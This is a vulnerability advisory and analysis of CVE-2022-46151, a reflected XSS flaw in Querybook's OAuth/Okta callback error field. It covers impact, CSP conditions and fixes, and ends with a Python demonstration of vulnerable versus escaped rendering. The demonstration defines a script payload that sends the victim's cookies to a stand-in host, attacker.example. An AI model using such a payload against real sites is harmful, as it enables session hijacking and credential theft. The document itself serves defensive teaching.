CVE-2022-46151 in Querybook
Summary
by MITRE • 12/06/2022
Querybook is an open source data querying UI. In affected versions user provided data is not escaped in the error field of the auth callback url in `querybook/server/app/auth/oauth_auth.py` and `querybook/server/app/auth/okta_auth.py`. This may allow attackers to perform reflected cross site scripting (XSS) if Content Security Policy (CSP) is not enabled or `unsafe-inline` is allowed. Users are advised to upgrade to the latest, patched version of querybook (version 3.14.2 or greater). Users unable to upgrade may enable CSP and not allow unsafe-inline or manually escape query parameters in a reverse proxy.
Analysis
by VulDB Data Team • 12/26/2022
CVE-2022-46151 is a reflected cross site scripting vulnerability in Querybook, an open source data querying user interface. The flaw sits in the authentication callback handling: the value of the error field in the authentication callback URL is user-controlled and is written into the response without HTML escaping. The affected code lives in two authentication modules, `querybook/server/app/auth/oauth_auth.py` and `querybook/server/app/auth/okta_auth.py`. Because the parameter is reflected back to the browser inside an error message without output encoding, an attacker who controls it can inject HTML and arbitrary JavaScript into the page.
The impact is that of a classic reflected XSS: script supplied in the URL runs in the Querybook origin in the victim's browser, where it can read or send whatever that origin exposes, for example session cookies not flagged HttpOnly or requests to Querybook's own API carrying the victim's cookies, leading to session hijacking, credential theft or unauthorized data access. Because the sink is the login flow's error page, the victim does not need to be logged in for the payload to fire; it executes as soon as the browser renders the error callback. Exploitation depends on the deployment's Content Security Policy: it succeeds when no CSP is enforced, or when `script-src` (or the `default-src` it falls back to) permits `unsafe-inline`, and it is blocked by a policy that forbids inline script. The weakness is CWE-79, Improper Neutralization of Input During Web Page Generation, which covers exactly this failure to output-encode untrusted data before writing it into HTML. The attack follows the standard reflected-XSS pattern: malicious input is embedded in a URL parameter and echoed back by the application into the page served to the user's browser.
A crafted callback URL can be delivered by any channel that gets a victim to open it, and once the script runs it can steal cookies readable by script, redirect the browser to an attacker-controlled site, or issue requests to Querybook on the victim's behalf. The placement in the authentication flow makes the lure more convincing: the URL points at the legitimate Querybook host and its login callback path, which is exactly where a user expects to land during sign-in, so the only visible oddity is the contents of the error parameter. In ATT&CK terms the delivery maps to T1566 (Phishing), specifically T1566.002 (Spearphishing Link). Organizations that use Querybook for data analysis face a real risk while unpatched, since a successful attack can expose the data sources and query results the victim's account can reach, with the compliance consequences that follow from such a disclosure.
The fix is to upgrade to Querybook 3.14.2 or later, where the error value is escaped before it is rendered. Where an immediate upgrade is not possible, two workarounds from the advisory apply. First, enforce a Content Security Policy whose `script-src` does not include `unsafe-inline` (and does not fall back to a `default-src` that does); this blocks the injected inline script even though the reflection itself remains. Second, HTML-escape the query parameters of the auth callback in a reverse proxy in front of Querybook, so the value reaching the application is already inert; this is coarse and can alter legitimate parameter values, so it should be scoped to the callback paths. Whatever the route, the durable fix is HTML-entity encoding of every user-provided value written into authentication error pages, applied at the output point, and the same output-encoding discipline should be checked across the other authentication modules so a sibling bug does not reappear.
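The reflection pattern from the analysis and the two workarounds from the mitigation paragraph, as an added Python example that is not Querybook's code. The error-page template, the function names, and the querybook.example and attacker.example hosts are hypothetical, and the payload and callback URL are constructed for the demonstration:

```python
"""Added example (not Querybook's code): the reflected-XSS pattern described
above beside two mitigations from the advisory. All names here
(render_auth_error_unsafe, render_auth_error_safe, escape_callback_query,
csp_allows_inline_scripts) are hypothetical."""
import html
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Constructed attacker value for the `error` query parameter of the callback URL.
PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'

# Constructed callback URL as the victim's browser would request it.
CALLBACK_URL = "https://querybook.example/oauth2callback?" + urlencode(
    {"error": PAYLOAD, "state": "abc123"}
)

# Hypothetical error page; the project's real template is not on this page.
AUTH_ERROR_TEMPLATE = "<html><body><h1>Login failed</h1><p>Error: {error}</p></body></html>"


def render_auth_error_unsafe(error: str) -> str:
    """Vulnerable pattern: the untrusted `error` value is interpolated into HTML
    verbatim, so a <script> in the query string becomes a <script> in the page."""
    return AUTH_ERROR_TEMPLATE.format(error=error)


def render_auth_error_safe(error: str) -> str:
    """Fixed pattern: HTML-entity-encode at the output point. quote=True also
    encodes ' and " so the value is inert inside attribute values, not only text."""
    return AUTH_ERROR_TEMPLATE.format(error=html.escape(error, quote=True))


def escape_callback_query(url: str) -> str:
    """Reverse-proxy style workaround: HTML-escape every decoded query value and
    re-encode it, so the backend decodes `&lt;script&gt;...` instead of a tag.
    Coarse: it also changes legitimate values containing & < > " or '."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    escaped = [(k, html.escape(v, quote=True)) for k, v in pairs]
    return urlunsplit(parts._replace(query=urlencode(escaped)))


def decoded_query(url: str) -> dict:
    """Decode the query string the way a backend (e.g. Flask's request.args) would."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def csp_allows_inline_scripts(csp: str) -> bool:
    """True if this Content-Security-Policy header value would let a reflected
    <script> block run. script-src governs; default-src is the fallback; no
    directive covering scripts means no restriction at all. A nonce or hash
    source makes browsers implementing CSP Level 2+ ignore 'unsafe-inline'."""
    directives = {}
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True
    if any(t.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for t in sources):
        return False
    return "'unsafe-inline'" in sources


if __name__ == "__main__":
    print("unsafe page contains <script>:", "<script>" in render_auth_error_unsafe(PAYLOAD))
    print("safe page contains <script>:  ", "<script>" in render_auth_error_safe(PAYLOAD))
    print("proxy-rewritten error param:  ", decoded_query(escape_callback_query(CALLBACK_URL))["error"])
    for policy in ("default-src 'self'", "script-src 'self' 'unsafe-inline'"):
        print(f"CSP {policy!r} allows inline scripts:", csp_allows_inline_scripts(policy))
```

The CSP helper is the check worth running against a live deployment's response headers: a policy that restricts images or frames but never names `script-src` or `default-src` offers no protection here, and one that lists `unsafe-inline` only protects if it also carries a nonce or hash source, which modern browsers treat as overriding the keyword.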